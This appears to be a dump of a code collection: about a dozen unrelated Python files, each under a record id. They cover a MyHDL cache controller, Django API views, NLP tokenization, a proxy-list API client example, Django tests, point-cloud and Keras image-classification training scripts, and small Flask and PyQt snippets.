License: See LICENSE
"""
from myhdl import Signal,intbv,modbv, concat, \
block,always_comb,always_seq, always, instances, enum, now
from rtl.util import int_log2
import rtl.cache.cache_way as cache_way
from rtl.cache.config import CacheConfig
from rtl.cache.cache_ram import CacheRAMBundle,cache_ram_instance
from rtl.cache.cache_businterface import BusOutputBundle, BusInputBundle, cache_dbslave_connect
from rtl.bonfire_interfaces import Wishbone_master_bundle
class CacheControlBundle:
    """Control/handshake signal bundle for cache management operations."""
    def __init__(self):
        self.invalidate = Signal(bool(0)) # Trigger invalidation of the Cache
        self.invalidate_ack = Signal(bool(0)) # Asserted for one cycle when invalidation is complete
        # TODO: Add other control lines
class CacheMasterWishboneBundle(Wishbone_master_bundle):
    """Wishbone master bundle pre-sized for the cache's memory-side bus.

    Address low bit and data width are derived from the cache configuration.
    NOTE(review): the default `config=CacheConfig()` instance is shared across
    calls -- confirm CacheConfig is treated as read-only.
    """
    def __init__(self,config=CacheConfig()):
        Wishbone_master_bundle.__init__(self,
                                        adrHigh=32,
                                        adrLow=int_log2(config.master_width_bytes),
                                        dataWidth=config.master_data_width,
                                        b4_pipelined=False,
                                        bte_signals=True)
@block
def cache_instance(db_slave,master,clock,reset,config=CacheConfig()):
    """
    slave : DbusBundle - slave interface connected to the "CPU side" of the cache
    master: CacheMasterWishboneBundle - master interface connected to the "outer memory"
    control: CacheControlBundle - interface for cache control
    """
    # Checks
    assert config.num_ways == 1, "Cache Instance, currently only 1 way implemented"
    #assert config.master_data_width == master.xlen, "Master Bus Width must be equal config.master_data_width"
    # State engine for the master-side refill/writeback bursts
    t_wbm_state = enum('wb_idle','wb_burst_read','wb_burst_write','wb_finish','wb_retire')
    wbm_state = Signal(t_wbm_state.wb_idle)
    # Word offsets within a cache line: cache-RAM side and Wishbone side
    cache_offset_counter = Signal(modbv(0)[config.cl_bits:])
    master_offset_counter = Signal(modbv(0)[config.cl_bits:])
    slave_cache_we = Signal(bool(0))
    # Slave Interface
    bus_input = BusInputBundle(config,db_slave.xlen)
    bus_output = BusOutputBundle(config,db_slave.xlen)
    # Splitted slave adr
    slave_adr_splitted = cache_way.AddressBundle(config)
    s_adr_i = slave_adr_splitted.from_bit_vector(bus_input.slave_adr_slice)
    # Enable signal for master Wishbone bus
    wbm_enable = Signal(bool(0))
    # Cache RAM
    cache_ram = CacheRAMBundle(config)
    c_r_i = cache_ram_instance(cache_ram,clock)
    if config.num_ways == 1:
        tag_control = cache_way.CacheWayBundle(config)
        tc_i = cache_way.cache_way_instance(tag_control,clock,reset)
    else:
        pass # TODO: Add support for num_ways > 1
    s_i = cache_dbslave_connect(db_slave,bus_input,bus_output,tag_control.hit,clock,reset,config)
    # @always(clock.posedge)
    # def debug_output():
    # if slave.en_o and tag_control.hit and not slave_rd_ack:
    # print("@{} Cache hit for address: {}, cache RAM adr:{}".format(now(),slave_adr_slice,cache_ram.slave_adr))
    # assert tag_control.buffer_index == slave_adr_splitted.tag_index, "Tag Index mismatch"
    # slave_adr_splitted.debug_print()
    # Cache RAM Bus Multiplexers
    if config.mux_size == 1:
        # Slave word width equals cache word width: straight wiring.
        @always_comb
        def db_mux_1():
            cache_ram.slave_db_wr.next = bus_input.slave_write
            cache_ram.slave_we.next = bus_input.slave_we
            bus_output.slave_read.next = cache_ram.slave_db_rd
            cache_ram.slave_adr.next = concat(slave_adr_splitted.tag_index,slave_adr_splitted.word_index)
    else:
        # Calculate slave bus address bits for selecting the right 32 slice
        # from the master bus
        mx_low = 0
        mx_high = mx_low + int_log2(config.mux_size)
        slave_db_mux_reg = Signal(modbv(0)[int_log2(config.mux_size):])
        # Calculate bit range from word_index to select the cache word of a line in cache ram
        wi_low = mx_high
        wi_high = wi_low + config.cl_bits
        @always(clock.posedge)
        def db_mux_sync():
            # Latch the 32-bit-slice selector on a hit for the read mux below.
            if tag_control.hit and bus_input.slave_en:
                slave_db_mux_reg.next = bus_input.slave_adr_slice[mx_high :mx_low]
        @always_comb
        def db_mux_n():
            # Data bus multiplexer
            bus_output.slave_read.next = 0 # Avoid latch
            for i in range(0,config.mux_size):
                if slave_db_mux_reg == i:
                    # Databus Multiplexer, select the 32 Bit word from the cache ram word.
                    bus_output.slave_read.next = cache_ram.slave_db_rd[(i+1)*32:(i*32)]
            cache_ram.slave_db_wr.next = 0
            for i in range(0,config.mux_size):
                # For writing the Slave bus can just be demutiplexed n times
                # Write Enable is done on byte lane level
                cache_ram.slave_db_wr.next[(i+1)*32:i*32] = bus_input.slave_write
                # Write enable line multiplexer
                if bus_input.slave_adr_slice[mx_high :mx_low] == i:
                    cache_ram.slave_we.next[(i+1)*4:i*4] = bus_input.slave_we
                else:
                    cache_ram.slave_we.next[(i+1)*4:i*4] = 0
            # Slave address bus
            cache_ram.slave_adr.next = concat(slave_adr_splitted.tag_index,slave_adr_splitted.word_index[wi_high:wi_low])
    @always_comb
    def proc_slave_write_enable():
        if bus_input.slave_en and bus_input.slave_we != 0 and tag_control.hit:
            slave_cache_we.next = True # slave.en_o and slave.we_o != 0 and tag_control.hit
        else:
            slave_cache_we.next = False
    @always_comb
    def cache_control_comb():
        # Tag Control
        tag_control.en.next = bus_input.slave_en
        tag_control.we.next = (master.wbm_ack_i and wbm_state==t_wbm_state.wb_finish) or slave_cache_we
        tag_control.dirty.next = slave_cache_we
        tag_control.valid.next = not tag_control.dirty_miss
        tag_control.adr.next = bus_input.slave_adr_slice
        # Cache RAM control signals
        # Slave side
        cache_ram.slave_en.next = tag_control.hit and bus_input.slave_en
        # Master side
        cache_ram.master_en.next = ( master.wbm_ack_i and wbm_enable ) or \
                                   ( tag_control.dirty_miss and wbm_state == t_wbm_state.wb_idle )
        cache_ram.master_we.next = master.wbm_ack_i and not tag_control.dirty_miss
        cache_ram.master_db_wr.next = master.wbm_db_i
        # Writeback reads use the victim line (buffer_index); refills write
        # the newly tagged line.
        if tag_control.dirty_miss:
            cache_ram.master_adr.next = concat(tag_control.buffer_index,cache_offset_counter)
        else:
            cache_ram.master_adr.next = concat(tag_control.tag_index,master_offset_counter)
        # Master bus
        master.wbm_cyc_o.next = wbm_enable
        master.wbm_stb_o.next = wbm_enable
        master.wbm_db_o.next = cache_ram.master_db_rd
    @always_comb
    def proc_master_adr():
        # Writeback targets the old (victim) tag; refill targets the
        # requested slave address.
        if tag_control.dirty_miss:
            master.wbm_adr_o.next = concat(tag_control.tag_value,
                                           tag_control.buffer_index,master_offset_counter)
        else:
            master.wbm_adr_o.next = concat(slave_adr_splitted.tag_value,
                                           slave_adr_splitted.tag_index,
                                           master_offset_counter)
    # State engine for cache refill/writeback
    @always_seq(clock.posedge,reset)
    def master_rw():
        if wbm_state == t_wbm_state.wb_idle:
            if tag_control.miss and not tag_control.hit:
                wbm_enable.next = True
                for i in range(0,len(master.wbm_sel_o)):
                    master.wbm_sel_o.next[i] = True
                master.wbm_cti_o.next = 0b010
                master.wbm_bte_o.next = 0b00
                if tag_control.dirty_miss:
                    cache_offset_counter.next = master_offset_counter + 1
                    master.wbm_we_o.next = True
                    wbm_state.next = t_wbm_state.wb_burst_write
                else:
                    master.wbm_we_o.next = False
                    wbm_state.next = t_wbm_state.wb_burst_read
        elif wbm_state == t_wbm_state.wb_burst_read or wbm_state == t_wbm_state.wb_burst_write:
            n = master_offset_counter + 1
            if master.wbm_ack_i:
                # Announce end-of-burst (CTI=111) one beat before the last word.
                if n == master_offset_counter.max-1:
                    master.wbm_cti_o.next = 0b111
                    wbm_state.next = t_wbm_state.wb_finish
                master_offset_counter.next = n
                cache_offset_counter.next = n + 1
        elif wbm_state == t_wbm_state.wb_finish:
            if master.wbm_ack_i:
                wbm_enable.next = False
                master.wbm_we_o.next = False
                master_offset_counter.next = 0
                cache_offset_counter.next = 0
                wbm_state.next = t_wbm_state.wb_retire
        else:
            assert wbm_state == t_wbm_state.wb_retire
            wbm_state.next = t_wbm_state.wb_idle
    return instances()
15,922 | cc7465e3e3357d1524c576ed19071b092f30e76a | # Copyright: 2019, NLnet Labs and the Internet.nl contributors
# SPDX-License-Identifier: Apache-2.0
import json
from django.http import HttpResponseRedirect
from django.views.decorators.http import require_http_methods
from .util import check_valid_user, batch_async_generate_results
from .util import get_site_url, APIMetadata, list_requests
from .util import register_request, get_request, patch_request
from .responses import api_response, unknown_request_response
from .responses import invalid_url_response, bad_client_request_response
from .responses import general_server_error_response
from .. import simple_cache_page
from ..models import BatchRequest
from ..models import BatchRequestStatus
@require_http_methods(['GET', 'POST'])
@check_valid_user
def endpoint_requests(request, *args, **kwargs):
    """Batch-requests collection endpoint: GET lists, POST registers."""
    if request.method == "POST":
        return register_request(request, *args, **kwargs)
    return list_requests(request, *args, **kwargs)
@require_http_methods(['GET', 'PATCH'])
@check_valid_user
def endpoint_request(request, request_id, *args, **kwargs):
    """Single batch-request endpoint: GET returns it, PATCH updates it.

    Responds with an unknown-request error when *request_id* does not belong
    to the authenticated batch user.
    """
    user = kwargs['batch_user']
    try:
        batch_request = BatchRequest.objects.get(
            user=user, request_id=request_id)
    except BatchRequest.DoesNotExist:
        return unknown_request_response()
    if request.method == "GET":
        return get_request(request, batch_request, user)
    elif request.method == "PATCH":
        return patch_request(request, batch_request)
def results(request, request_id, *args, technical=False, **kwargs):
    """Return the generated report for a finished batch request.

    If the request is done but the report file is not on disk yet, kick off
    asynchronous report generation and answer "not yet done" in the meantime.
    """
    user = kwargs['batch_user']
    try:
        batch_request = BatchRequest.objects.get(
            user=user, request_id=request_id)
    except BatchRequest.DoesNotExist:
        return unknown_request_response()
    # Guard clauses replace the original nested else-blocks.
    if batch_request.status != BatchRequestStatus.done:
        return bad_client_request_response("The request is not yet `done`.")
    if not batch_request.has_report_file():
        batch_async_generate_results.delay(
            user=user,
            batch_request=batch_request,
            site_url=get_site_url(request))
        return bad_client_request_response(
            "The request is not yet `done`.")
    report_file = batch_request.get_report_file(technical)
    try:
        report_file.open('r')
        data = json.load(report_file)
    except Exception:
        return general_server_error_response(
            "Report could not be generated.")
    finally:
        report_file.close()
    return api_response(data)
@require_http_methods(['GET'])
@check_valid_user
def endpoint_results(request, request_id, *args, **kwargs):
    """Results report for a finished batch request (default variant)."""
    return results(request, request_id, *args, **kwargs)

@require_http_methods(['GET'])
@check_valid_user
def endpoint_results_technical(request, request_id, *args, **kwargs):
    """Technical (raw) results report for a finished batch request."""
    return results(request, request_id, *args, technical=True, **kwargs)

@require_http_methods(['GET'])
@check_valid_user
def endpoint_metadata_report(request, *args, **kwargs):
    """Expose the metadata describing the report format."""
    return api_response({"report": APIMetadata.get_report_metadata()})

@require_http_methods(['GET'])
def documentation(request, *args, **kwargs):
    """Redirect to the static OpenAPI specification."""
    return HttpResponseRedirect('/static/openapi.yaml')

@check_valid_user
def old_url(request, *args, **kwargs):
    """Catch-all handler for deprecated API URLs."""
    return invalid_url_response()
15,923 | 6c1115cec25714a0a7c9f7ac953e12b747d8a8f5 | import sys, traceback
import json
from NLP.Utils.TextUtilities import fix_bad_unicode_textacy as fix_bad_unicode
from NLP.Utils.Words import Words
from NLP.Utils.text_normalization import plain_text_abstract
class NlpProc():
    """Tokenization / NER helper built around a lazily loaded NLP pipeline."""
    def __init__(self):
        # Pipeline is loaded on first access through the `nlp` property.
        self._nlp = None
        self.language = 'en'
    @property
    def nlp(self):
        """Lazily instantiate and return the NLP pipeline for self.language."""
        if self._nlp is None:
            from NLP.nlp import NLP
            self._nlp = NLP.nlp(self.language)
        # Fix: the original asserted `self.nlp is not None`, re-entering this
        # property for a redundant second lookup; check the backing attribute.
        assert self._nlp is not None
        return self._nlp
    def get_language_from_object(self, odata):
        """ Gets language from given mongo object of content
        If not found, returns language as 'en'
        Args:
            odata: mongo object of content
        Returns: language from mongo object
        """
        try:
            if odata.get('lxp', {}).get('language', None):
                language = odata['lxp']['language']
            elif odata.get('meta', {}).get('ecl', {}).get('lang', None):
                language = odata['meta']['ecl']['lang']
            else:
                language = 'en'
        except (AttributeError, KeyError):
            print("Exception getting language")
            language = 'en'
        return language
    def _tokenize(self, text, language, stemming=False,remove_stops=True,split=True,lemmatize=True):
        """ refactored to preserve tokenized sentences
        Test case fail L'objectif de l'ex GDF-Suez est de 2.200 MWc installés à l'horizon 2021.
        """
        special = {'fr': 'dans y'.split(' ')} # why not add to fr stops?
        spec = special.get(language, [])
        text = fix_bad_unicode(text.encode("utf-8").decode("utf-8"))
        sentences = self.nlp.sentence_tokenize(text.lower())
        cleaned_sentences = []
        for sentence in sentences:
            if lemmatize:
                # Map surface form -> lemma, skipping the language-special
                # tokens (fixes elided articles such as L').
                lookup = dict([[x.text.lower(), x.lemma_] for x in sentence if
                               x.text.lower() not in spec]) # fixes L'
                lemmatized_text = ' '.join(
                    [lookup.get(x.text.lower(), x.text.lower()) for x in sentence if not (x.is_space or x.is_punct)])
            else:
                lemmatized_text = ' '.join([x.text.lower() for x in sentence if not (x.is_space or x.is_punct)])
            normed = (Words.normalizeTextNew(lemmatized_text, removeRefs=False, remove_stops=remove_stops, lower=False,
                                             split=split, language=language))
            cleaned_sentences.append(normed)
        if stemming:
            # NOTE(review): no `stemmer` attribute is defined in this class --
            # confirm it is provided elsewhere before calling with stemming=True.
            cleaned_sentences = [self.stemmer(language=language).stemWords(sentence) for sentence in cleaned_sentences]
        return cleaned_sentences # backwards compatability
    def perform_nlp(self, oid, odata, stemming=False, named_entities=False,
                    remove_stops=True, lemmatize=True):
        """Tokenize (and optionally NER-tag) one content object.

        Args:
            oid: identifier of the content object (echoed back in the result).
            odata: JSON string of the mongo content object.
        Returns:
            (oid, json-string) tuple on success, or None when the text is
            missing or any processing step fails.
        """
        try:
            item = {}
            odata = json.loads(odata)
            text = odata.get('excerpt') or odata.get('lxp', {}).get('description')
            # get content language
            language = self.get_language_from_object(odata)
            if not text:
                print('no excerpt for keys %s' % (oid))
                return None
            plain_text = plain_text_abstract(text)
            item['sentences'] = self._tokenize(plain_text, language=language, stemming=stemming,
                                               remove_stops=remove_stops, split=True, lemmatize=lemmatize)
            if named_entities:
                """ generates list of entities for each type"""
                try:
                    ent_kinds = ['PERSON', 'ORG','WORK_OF_ART', 'PRODUCT','EVENT']
                    entities = {}
                    text = str(plain_text)
                    doc = self.nlp(text) or []
                    for ent in doc.ents:
                        if ent.label_ in ent_kinds:
                            ne = ent.text.replace('\n','')
                            ents = entities.setdefault(ent.label_, [])
                            ents.append(ne)
                    item['ents'] = entities
                except Exception as error:
                    print('>>>entity_exception %s',error)
                    return None
        except Exception as error:
            print(error)
            exc_type, exc_value, exc_traceback = sys.exc_info()
            print('TRACE %s' % (repr(traceback.format_tb(exc_traceback))))
            return None
        print(item)
        return oid, json.dumps(item)
|
15,924 | 4f3442e03f199088f686f655643cd80df74d3f60 | #!/usr/bin/env python
'''
This file includes examples of how to use the API. You will have to obtain your own API Key to use the API.
The API Key must be put in the request header of all requests to the API. There are two main ways to use
the API-- the first is to retrieve proxies, and teh second is to report their success. Please be sure to
try and follow through by reporting successes and failures of proxies you retrieve. Proxy data in the under-
lying database starts with a very low success rate, and then the success rate of proxies increases as users
vet proxies and report their results-- reported successes will give proxies a higher score, and reported
failures will lower the score, until the system decides that it's safe to say the proxy is not going to work
and disables it.
IMPORTANT-- You will see that you have the option to specify the site you are using, or to omit that information.
When reporting successes and failures, if you specify the website, the failure will only be registered for that
site alone. So a site that is reported to have failed 10 times for lowes.com may still be considered valid for
bestbuy.com, since you really aren't sure that it doesn't work for bestbuy.com until you try it. If the proxy
has found to fail for many sites repetitively, the system will eventually realize taht it's just not working for
any site at all and disable it. However, if you omit the website when reporting successes/failures, this counts
against the proxy itself (for all websites), which has a much more far-reaching impact. So keep this in mind
when deciding whether or not to report the website when reporting successes/failures. It will ultimately come
down to whether or not you are confident that the failure was a result of the proxy in general or something
specific about the website.
Lastly note that this is running on a gen2 core i5 PC with a spinning drive sitting in my basement. It's used for
other things too, and it often restarts itself and is offline for short periods of time-- also performance is probably
going to underwhelm a little. I would recommend taking the approach of using the API to retrieve batches of proxies
and store them locally for use instead of relying on this API to be online and performant at the moment you
need to use the proxy. I also may have to throttle proxy requests per hour to reduce the amount of database
queries-- 1 request for 100 proxies would be preferable to 100 requests for 1 proxy each, but I wouldn't bend
over backwards to accomplish it this way if it's an issue for you.
'''
import requests
import json
# How to configure session to use API Key
headers = {
    'APIKey': 'c9a12ad3-025c-4cf6-a454-f163e75dc205' # Use your API key. This one will be invalid.
}
session = requests.session()
session.headers = headers
# How to use the API to retrieve 2 proxies for lowes.com
response = session.get("http://url.here/api/proxy/list/lowes.com/2")
# Note that the quantity provided may fall short of what was requested by up to 50%,
# but should usually match or be within 10%
if (response.status_code == 403):
    print("Authentication Error. API Key was probably wrong or missing.")
elif (response.status_code == 200):
    # A 200 response carries a JSON list of proxy records (see the examples below).
    for proxy in json.loads(response.text):
        url = proxy["url"]
        print(url)
'''
Unvetted Proxy Example:
{
'proxyID': 1031247, -- The ID used for this proxy in the API
'url': 'http://91.150.67.210:55318', -- Proxy Location
'proxyScore': 0, -- Proxy Score (higher is better).\
-- "0" probably means that this proxy has not been tested yet.
'country': 'Serbia', -- Country of Proxy (not always correct in practice)
'streak': 0, -- How many consecutive successes has this proxy had?
'site': None, -- The site that this proxy's site score is for.\
"None" means the proxy hasn't been tested against the requested site yet.
'siteScore': None, -- The proxy's score for the given site (higher is better).\
"None" means the proxy hasn't been tested against the requested site yet.
'source': 'my list', -- The site, API, etc. that provided the API with the proxy's location
'siteVetted': False -- True if this proxy has been tested against the given site, false if it hasn't been tested yet.
}
Vetted Proxy Example:
'proxyID': 98797,
'url': 'http://186.47.62.94:44892',
'proxyScore': 3, -- score of 3 for proxy as a whole
'country': 'Ecuador',
'streak': -1,
'site': 'lowes.com',
'siteScore': 18, -- site score of 18 for lowes.com
'source': 'my list',
'siteVetted': True
'''
# How to contribute to the database by indicating if a proxy is working or not.
session.headers = {
    'Content-type' : 'application/json',
    'APIKey': 'c9a12ad3-025c-4cf6-a454-f163e75dc205', # Use your API key. This one will be invalid.
}
# Build the report as a dict and serialize it with json.dumps(). The previous
# hand-built string used single quotes, which is NOT valid JSON and would have
# tripped the 400 ("JSON was not encoded properly") branch below.
report = {
    'site': 'lowes.com',   # The site all of the successes/failures are being reported for. You can
                           # omit this if you are not tracking it, though it is most useful to have.
    'successes': 5,        # Indicate that the proxy has succeeded 5 times.
    'failures': 1,         # Indicate that the proxy failed 1 time.
    'banned': 'False',     # Set this to true if you know the proxy is banned for the provided site.
                           # An example of a ban is a case where your proxy is from New Zealand
                           # and the site loads a page indicating that the merchant only does business in
                           # North America. Since this would definitively tell you that the proxy will never
                           # work with the given site, the banned indicator is a means of immediately cutting
                           # off this proxy from the given site, instead of relying on scoring attempts to
                           # eventually decide that it isn't working.
}
json_data = json.dumps(report)
response = session.put("http://url.here/api/proxy/131248", data=json_data)
if (response.status_code == 403):
    print("Authentication Error. API Key was probably wrong or missing.")
elif (response.status_code == 400):
    print("400. This usually means the JSON was not encoded properly.")
    print(response.text)
elif (response.status_code == 204):
    print("Success/Failure update was successful.")
else:
    print("Unknown Failure.")
    print(response.status_code)
    print(response.text)
|
15,925 | 8c50bcafd0b116cc85acd3e1821dea2475c72a4a | from django.test import TestCase
from model_mommy import mommy
from examples.models import ExampleState
from projects.models import ProjectType
from projects.tests.utils import prepare_project
class TestExampleState(TestCase):
    """Tests for ExampleState.objects: count_done() and measure_member_progress()."""
    def setUp(self):
        # One sequence-labeling project with two examples, shared by every test.
        self.project = prepare_project(ProjectType.SEQUENCE_LABELING)
        self.example = mommy.make("Example", project=self.project.item)
        self.other = mommy.make("Example", project=self.project.item)
        self.examples = self.project.item.examples.all()
    def test_initial_done(self):
        """No confirmations yet -> zero examples counted as done."""
        done = ExampleState.objects.count_done(self.examples)
        self.assertEqual(done, 0)
    def test_done_confirmed_by_user(self):
        """One confirmation marks exactly one example done."""
        mommy.make("ExampleState", example=self.example, confirmed_by=self.project.admin)
        done = ExampleState.objects.count_done(self.examples)
        self.assertEqual(done, 1)
    def test_done_confirmed_by_multiple_user(self):
        """Two users confirming the same example still counts it once."""
        mommy.make("ExampleState", example=self.example, confirmed_by=self.project.admin)
        mommy.make("ExampleState", example=self.example, confirmed_by=self.project.approver)
        done = ExampleState.objects.count_done(self.examples)
        self.assertEqual(done, 1)
    def test_done_confirmed_by_different_example(self):
        """Passing a user filters the count to that user's confirmations."""
        mommy.make("ExampleState", example=self.example, confirmed_by=self.project.admin)
        mommy.make("ExampleState", example=self.other, confirmed_by=self.project.approver)
        done = ExampleState.objects.count_done(self.examples, self.project.admin)
        self.assertEqual(done, 1)
    def test_initial_user(self):
        """With no confirmations every member's progress is zero."""
        progress = ExampleState.objects.measure_member_progress(self.examples, self.project.members)
        expected_progress = [{"user": member.username, "done": 0} for member in self.project.members]
        self.assertEqual(progress, {"total": 2, "progress": expected_progress})
    def test_user_count_after_confirmation(self):
        """A confirmation increments only the confirming member's counter."""
        mommy.make("ExampleState", example=self.example, confirmed_by=self.project.admin)
        progress = ExampleState.objects.measure_member_progress(self.examples, self.project.members)
        expected_progress = [{"user": member.username, "done": 0} for member in self.project.members]
        expected_progress[0]["done"] = 1
        self.assertEqual(progress, {"total": 2, "progress": expected_progress})
    def test_user_count_after_multiple_user_confirmation(self):
        """Confirmations by two users are tallied per user."""
        user1 = self.project.admin
        user2 = self.project.approver
        mommy.make("ExampleState", example=self.example, confirmed_by=user1)
        mommy.make("ExampleState", example=self.example, confirmed_by=user2)
        progress = ExampleState.objects.measure_member_progress(self.examples, self.project.members)
        expected_progress = [{"user": member.username, "done": 0} for member in self.project.members]
        expected_progress[0]["done"] = 1
        expected_progress[1]["done"] = 1
        self.assertEqual(progress["total"], 2)
        # Order of members is not guaranteed here, hence assertCountEqual.
        self.assertCountEqual(progress["progress"], expected_progress)
class TestExample(TestCase):
    """Example.data dispatches on project type (text vs. image)."""
    def test_text_project_returns_text_as_data_property(self):
        """For a text project, .data mirrors .text."""
        project = prepare_project(ProjectType.SEQUENCE_LABELING)
        example = mommy.make("Example", project=project.item)
        self.assertEqual(example.text, example.data)
    def test_image_project_returns_filename_as_data_property(self):
        """For an image project, .data is the stringified filename."""
        project = prepare_project(ProjectType.IMAGE_CLASSIFICATION)
        example = mommy.make("Example", project=project.item)
        self.assertEqual(str(example.filename), example.data)
|
15,926 | 8a716aceb8ddf618f6466377805486a7c482f3b5 | class LuasSegititiga():
def hitung(self,alas:float,tinggi:float):
return 0.5*alas*tinggi
#kubus,balok,kerucut,bola,tabung,limas segitiga,prisma segitiga |
15,927 | 44d3c523c36bb23e36a607ecece59ae0f4060567 | import torch.utils.data as data
import os
import numpy as np
def default_flist_reader(ply_data_dir, flist):
    """Read a file list and return (pts_path, seg_path, label_id) tuples.

    flist format: ``pts_file seg_file label`` on each line; the two file
    names are joined onto *ply_data_dir*, the label stays a string.
    """
    all_data = []
    # `with` guarantees the handle is closed even if a malformed line raises
    # (the original closed it manually, leaking on exceptions).
    with open(flist, 'r') as ffiles:
        for line in ffiles:
            # Parse each line once instead of splitting it three times.
            pts_name, seg_name, label_id = line.rstrip().split()[:3]
            all_data.append((os.path.join(ply_data_dir, pts_name),
                             os.path.join(ply_data_dir, seg_name),
                             label_id))
    return all_data  # (pts_file_path, seg_file_path, label_id)
def default_loader(pts_file_path, seg_file_path):
    """Load one point cloud (float32, one point per row) and its
    per-point part ids (uint8, one id per line)."""
    with open(pts_file_path, 'r') as pts_file:
        rows = [line.split() for line in pts_file]
    pts = np.array(rows, dtype=np.float32)
    with open(seg_file_path, 'r') as seg_file:
        part_ids = np.array([int(line) for line in seg_file], dtype=np.uint8)
    return pts, part_ids
class PlyFileList(data.Dataset):
    """Dataset of (points, set-local segmentation ids, label id) triples
    driven by a file list (see default_flist_reader / default_loader)."""
    def __init__(self, ply_data_dir,
                 test_ply_file_list_path,
                 label_id_pid2pid_in_set,
                 label_ids2ids, label_ids,
                 flist_reader=default_flist_reader,
                 transform=None, target_transform=None,
                 loader=default_loader):
        # List of (pts_path, seg_path, label_id) tuples.
        self.ply_data_full_paths = flist_reader(ply_data_dir, test_ply_file_list_path)
        # Maps '<label name>_<raw part id>' -> part id within the evaluated set.
        self.label_id_pid2pid_in_set = label_id_pid2pid_in_set
        # Maps raw label id string -> integer class index.
        self.label_ids2ids = label_ids2ids
        # Indexable collection of label names, keyed by class index.
        self.label_ids = label_ids
        self.transform = transform
        self.target_transform = target_transform
        self.loader = loader
    def __getitem__(self, index):
        """Return (points, remapped per-point seg ids, raw label id)."""
        pts_file_path, seg_file_path, label_id = self.ply_data_full_paths[index]
        cur_gt_label = self.label_ids2ids[label_id]
        pts_data, part_ids= self.loader(pts_file_path, seg_file_path)
        # convert to seg_data: remap raw part ids into set-local part ids.
        seg_data = np.array([self.label_id_pid2pid_in_set[self.label_ids[cur_gt_label]+'_'+str(x)] for x in part_ids])
        if self.transform is not None:
            pts_data = self.transform(pts_data)
        if self.target_transform is not None:
            seg_data = self.target_transform(seg_data)
        return pts_data, seg_data, label_id
    def __len__(self):
        return len(self.ply_data_full_paths)
15,928 | 6220c3c08af6c6db5713c5565de86f79d21f34e1 | import keras
import tensorflow as tf
import sys
import os
from tensorflow.python.keras.preprocessing.image import ImageDataGenerator #para preprocesar las imagenes
from tensorflow.python.keras import optimizers
from tensorflow.python.keras.models import Sequential #para hacer CNN secuenciales
from tensorflow.python.keras.layers import Dropout, Flatten, Dense, Activation
from tensorflow.python.keras.layers import Convolution2D, MaxPooling2D
from tensorflow.python.keras import backend as K
from tensorflow.python.keras import applications #modelos de entrenamiento
from sklearn.externals import joblib
from keras.callbacks import TensorBoard
import time
K.clear_session()
# Data directories (train / validation), one subfolder per class.
data_entrenamiento = './data/entrenamiento'
data_validacion = './data/validacion'
epocas=10
longitud, altura = 224, 224
batch_size = 32 # number of images processed per step
pasos_entrenamiento = 10 # batches processed per epoch during training
pasos_validacion = 10
filtrosConv1 = 32
filtrosConv2 = 64
tamano_filtro1 = (3, 3)
tamano_filtro2 = (2, 2)
tamano_pool = (2, 2)
clases = 2
lr = 0.002
# Unique run name for TensorBoard log separation.
NAME = "Adamax{}".format(time.time())
"""
callbacks fit_generator()
"""
detener = tf.keras.callbacks.EarlyStopping(monitor='val_acc', patience=epocas, mode='max')
tensorboard = tf.keras.callbacks.TensorBoard(log_dir='./graphs9/{}'.format(NAME) )
# Preprocessing: rescale pixels to [0, 1]; flip augmentation for training only.
entrenamiento_datagen = ImageDataGenerator(
    rescale=1. / 255,
    horizontal_flip=True)
validacion_datagen = ImageDataGenerator(rescale=1. / 255)
entrenamiento_generador = entrenamiento_datagen.flow_from_directory(
    data_entrenamiento,
    target_size=(altura, longitud),
    batch_size=batch_size,
    class_mode='categorical')
validacion_generador = validacion_datagen.flow_from_directory(
    data_validacion,
    target_size=(altura, longitud),
    batch_size=batch_size,
    class_mode='categorical')
# VGG16 transfer learning: keep the convolutional base, replace the classifier head.
def modelo():
    """Build a Sequential model from pretrained VGG16 whose original 1000-way
    prediction layer is replaced by a `clases`-way softmax; base layers frozen."""
    vgg=applications.vgg16.VGG16()
    cnn=Sequential()
    # Copy every layer except the final prediction layer. The previous code
    # added all layers and then called `cnn.layers.pop()`, which mutates the
    # layer list but does not rewire the model's output tensor, leaving the
    # old 1000-class head effectively in place.
    for capa in vgg.layers[:-1]:
        cnn.add(capa)
    # Freeze the pretrained base so only the new head is trained.
    for layer in cnn.layers:
        layer.trainable=False
    cnn.add(Dense(clases,activation='softmax'))
    return cnn
cnn=modelo()
cnn.compile(loss='categorical_crossentropy',
            optimizer=optimizers.Adamax(lr=lr),
            metrics=['accuracy'])
# Training loop with TensorBoard logging and early stopping.
cnn.fit_generator(
    entrenamiento_generador,
    steps_per_epoch=pasos_entrenamiento,
    epochs=epocas,
    validation_data=validacion_generador,
    validation_steps=pasos_validacion,
    callbacks=[tensorboard, detener])
# Persist model architecture+weights and a separate weights-only file.
target_dir = './modelo_cnn/'
if not os.path.exists(target_dir):
    os.mkdir(target_dir)
cnn.save('./modelo_cnn/modelo2.h5')
cnn.save_weights('./modelo_cnn/pesos2.h5')
|
15,929 | dffbb97eeaf1a8d1de9dc818815fc7ce3d122f68 | from sklearn.cross_validation import cross_val_score, ShuffleSplit
from sklearn.datasets import load_boston#波士顿房屋价格预测
from sklearn.ensemble import RandomForestRegressor
import numpy as np
#集成学习ensemble库中的随机森林回归RandomForestRegressor
#Load boston housing dataset as an example
boston = load_boston()
X = boston["data"]
Y = boston["target"]
names = boston["feature_names"]
rf = RandomForestRegressor(n_estimators=20, max_depth=4)
# 20 estimators, depth 4
scores = []
print(X.shape)
for i in range(X.shape[1]):  # fit the model on each single feature and collect its CV score
    score = cross_val_score(rf, X[:, i:i+1], Y, scoring="r2",
                            cv=ShuffleSplit(len(X), 3, .3))
    scores.append((round(np.mean(score), 3), names[i]))
print (sorted(scores, reverse=True))  # rank features by their mean r2 score
15,930 | e0c9e99f7baa7d34a2ca1661d1dacf677146284b | #!/usr/bin/env python2.7
# encoding: utf-8
# Copyright (c) 2016 Dilusense Inc. All Rights Reserved.
# all api is for frontend interface
import json
from custom_libs.custom_decorator import check_login
from flask_application import app
@app.route('/config')
def config():
    """GET /config: return an empty config payload, {"code": 0, "data": {}}."""
    return json.dumps({
        'code': 0,
        'data': {}
    })
|
15,931 | 3f02f6789aaf4ebc9c537dc7e5f037c05e9abdf9 | from PyQt4 import QtCore, QtWebKit, QtGui
from GUI.main import BrowserGUI, BrowserTabGUI
# Keyboard shortcuts mapped to QWebPage navigation actions (not wired up in this module).
actions = {"Alt+Left" : QtWebKit.QWebPage.Back, "Alt+Right" : QtWebKit.QWebPage.Forward, "F5" : QtWebKit.QWebPage.Reload }
class BaseBrowser(BrowserGUI):
    """
